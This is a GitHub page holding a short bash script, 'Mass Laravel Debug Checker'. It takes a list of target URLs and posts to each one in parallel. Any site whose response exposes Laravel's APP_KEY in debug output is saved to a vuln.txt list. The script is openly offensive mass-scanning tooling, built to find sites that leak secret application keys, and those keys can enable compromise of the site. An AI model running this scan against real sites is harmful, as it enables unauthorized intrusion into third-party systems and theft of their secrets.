-
Notifications
You must be signed in to change notification settings - Fork 13
/
Copy pathlaravel-debugcheck.sh
38 lines (32 loc) · 1.14 KB
/
laravel-debugcheck.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/bin/bash
# Mass Laravel Debug Checker
# Created By Im-Hanzou
# Using GNU Parallel
# Usage: bash file.sh list.txt thread
yellow='\033[0;33m'
cat << "EOF"
_ _
| | __ _ _ _ __ _ __ __ ___ | |
| |__ / _` || '_|/ _` |\ V // -_)| |
|____|\__,_||_| \__,_| \_/ \___||_|
EOF
printf "${yellow}Mass Laravel Debug Checker\nGithub : im-hanzou\nUsage: bash file.sh list.txt thread\nExample: bash laravel-debugcheck.sh list.txt 50\n\n\n"
exploit(){
classic='\033[0m'
red='\e[41m'
green='\e[42m'
target=$1
thread=$2
if [[ $(curl --silent --connect-timeout 10 --max-time 10 --insecure $target -d '[]') =~ '<td>APP_KEY</td>' || $(curl --silent --connect-timeout 10 --max-time 10 --insecure $target -d '[]') =~ 'APP_KEY' ]];
then
printf "${green}[ Vuln ]${classic} => [ $target | Laravel Debug ] \n";
printf "$target\n" >> vuln.txt
else
printf "${red}[ Not Vuln ]${classic} => $target \n";
printf "$target\n" >> bad.txt
fi
}
export --no-notice -f exploit
parallel -j $2 exploit :::: $1
printf "\033[0;36mCheck Vuln : vuln.txt\n";
printf "\033[0;36mBad Site : bad.txt\n";